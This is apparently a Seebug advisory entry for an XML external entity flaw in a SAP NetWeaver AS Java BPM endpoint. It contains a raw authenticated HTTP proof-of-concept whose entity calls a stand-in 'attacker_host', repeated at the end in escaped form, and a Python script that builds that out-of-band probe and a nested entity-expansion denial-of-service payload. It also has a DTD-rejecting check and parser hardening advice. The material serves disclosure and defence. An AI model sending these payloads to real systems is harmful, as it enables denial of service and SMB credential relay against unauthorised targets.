SAP NetWeaver AS JAVA - 'BC-BMT-BPM-DSK' XML external entity injection vulnerability

2016-11-23T00:00:00
ID SSV:92552
Type seebug
Reporter Root
Modified 2016-11-23T00:00:00

Description

1) An attacker can cause a denial of service, for example with an XML entity expansion attack, because the endpoint's XML parser processes a DTD supplied in the request and expands the entities it declares.

2) An SMB relay attack is a man-in-the-middle attack in which the attacker makes the victim authenticate to a machine under the attacker's control and then relays those credentials to the real target. The attacker forwards the authentication exchange in both directions and thereby gains access as the victim. In the XXE context the external entity is pointed at an attacker-controlled SMB share, so it is the application server that initiates the authentication.

PoC

The request below is authenticated: the Basic credentials decode to the placeholder erpscan:erpscan, so a valid NetWeaver user is needed. Replace SAP_IP, SAP_PORT and attacker_host, then watch for the inbound connection on attacker_host; that connection confirms the parser resolves external entities.

```
POST /sap.com~tc~bpem~him~uwlconn~provider~web/bpemuwlconn HTTP/1.1
Content-Type: text/xml
User-Agent: ERPscan
Host: SAP_IP:SAP_PORT
Content-Length: 480
Connection: Keep-Alive
Cache-Control: no-cache
Authorization: Basic ZXJwc2NhbjplcnBzY2Fu

<!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://attacker_host"> ]><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
<SOAP-ENV:Body>
   <m:isBPMSInUse xmlns:m="http://api.facade.bpem.sap.com/"/>
&xxe;</SOAP-ENV:Body>
</SOAP-ENV:Envelope>
```
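As an added example (not part of the advisory and not ERPScan's tooling), the following Python builds the out-of-band probe from the PoC with a Content-Length that matches the body, the entity-expansion variant described in item 1 of the description, and a pre-parse check that a reverse proxy or the service itself could apply: SOAP 1.1 forbids a Document Type Declaration in a message, so any DTD in the body can be rejected before the XML parser sees it. Host, port, credentials, callback URL and the expansion depth are placeholders chosen here.

```python
"""Added example: XXE probe construction and a pre-parse DTD check for the
BPM UWL connector endpoint. Not code from the advisory; endpoint path and
SOAP operation are copied from the PoC, everything else is assumed."""
import base64
import re

# Endpoint and operation as they appear in the advisory PoC.
ENDPOINT = "/sap.com~tc~bpem~him~uwlconn~provider~web/bpemuwlconn"
SOAP_ENV = (
    '<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" '
    'xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" '
    'xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" '
    'xmlns:xsd="http://www.w3.org/2001/XMLSchema">'
    "<SOAP-ENV:Body>"
    '<m:isBPMSInUse xmlns:m="http://api.facade.bpem.sap.com/"/>'
    "{entity_ref}"
    "</SOAP-ENV:Body></SOAP-ENV:Envelope>"
)


def benign_body() -> bytes:
    """A normal isBPMSInUse call with no DTD at all."""
    return SOAP_ENV.format(entity_ref="").encode()


def oob_xxe_body(callback_url: str) -> bytes:
    """Out-of-band probe: the parser fetches callback_url when it expands &xxe;."""
    dtd = f'<!DOCTYPE foo [<!ENTITY xxe SYSTEM "{callback_url}">]>'
    return (dtd + SOAP_ENV.format(entity_ref="&xxe;")).encode()


def entity_expansion_body(depth: int = 10, fanout: int = 10) -> bytes:
    """DoS variant: nested internal entities that expand to fanout**depth copies of 'lol'."""
    decls = ['<!ENTITY lol0 "lol">']
    for i in range(1, depth + 1):
        ref = f"&lol{i - 1};" * fanout
        decls.append(f'<!ENTITY lol{i} "{ref}">')
    dtd = "<!DOCTYPE foo [" + "".join(decls) + "]>"
    return (dtd + SOAP_ENV.format(entity_ref=f"&lol{depth};")).encode()


def expansion_size(depth: int, fanout: int) -> int:
    """Bytes the innermost entity expands to (3 bytes of 'lol' per leaf)."""
    return 3 * fanout ** depth


def build_request(host: str, port: int, body: bytes, user: str, password: str) -> bytes:
    """Assemble the raw HTTP request as in the PoC, with the real Content-Length."""
    token = base64.b64encode(f"{user}:{password}".encode()).decode()
    headers = [
        f"POST {ENDPOINT} HTTP/1.1",
        "Content-Type: text/xml",
        "User-Agent: ERPscan",
        f"Host: {host}:{port}",
        f"Content-Length: {len(body)}",
        "Connection: Keep-Alive",
        "Cache-Control: no-cache",
        f"Authorization: Basic {token}",
    ]
    return ("\r\n".join(headers) + "\r\n\r\n").encode() + body


# Any DOCTYPE or ENTITY declaration; SOAP 1.1 messages must not carry a DTD.
_DTD_RE = re.compile(rb"<!(DOCTYPE|ENTITY)\b", re.IGNORECASE)


def has_dtd(body: bytes) -> bool:
    """Reject-before-parse check: True if the SOAP body carries a DTD."""
    return _DTD_RE.search(body) is not None


if __name__ == "__main__":
    # Placeholder target and credentials; no request is sent here.
    req = build_request("SAP_IP", 50000, oob_xxe_body("http://attacker_host"), "erpscan", "erpscan")
    print(req.decode())
    print("blocked by pre-parse check:", has_dtd(req.partition(b"\r\n\r\n")[2]))
```

The regex check is a stopgap for a gateway in front of the service; it does not replace the parser-side fix of disabling DTD processing (for Xerces-based JAXP parsers, the `http://apache.org/xml/features/disallow-doctype-decl` feature) and applying the vendor correction.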

                                        
                                            
                                                POST /sap.com~tc~bpem~him~uwlconn~provider~web/bpemuwlconn HTTP/1.1
 
Content-Type: text/xml
 
User-Agent: ERPscan
 
Host: SAP_IP:SAP_PORT
 
Content-Length: 480
 
Connection: Keep-Alive
 
Cache-Control: no-cache
 
Authorization: Basic ZXJwc2NhbjplcnBzY2Fu
 
 
&lt;!DOCTYPE foo [&lt;!ENTITY xxe SYSTEM "http://attacker_host"&gt;
]&gt;&lt;SOAP-ENV:Envelope
xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:xsd="http://www.w3.org/2001/XMLSchema"&gt;
 
   &lt;SOAP-ENV:Body&gt;
 
       &lt;m:isBPMSInUse xmlns:m="http://api.facade.bpem.sap.com/"/&gt;
 
   &xxe;&lt;/SOAP-ENV:Body&gt;
 
&lt;/SOAP-ENV:Envelope&gt;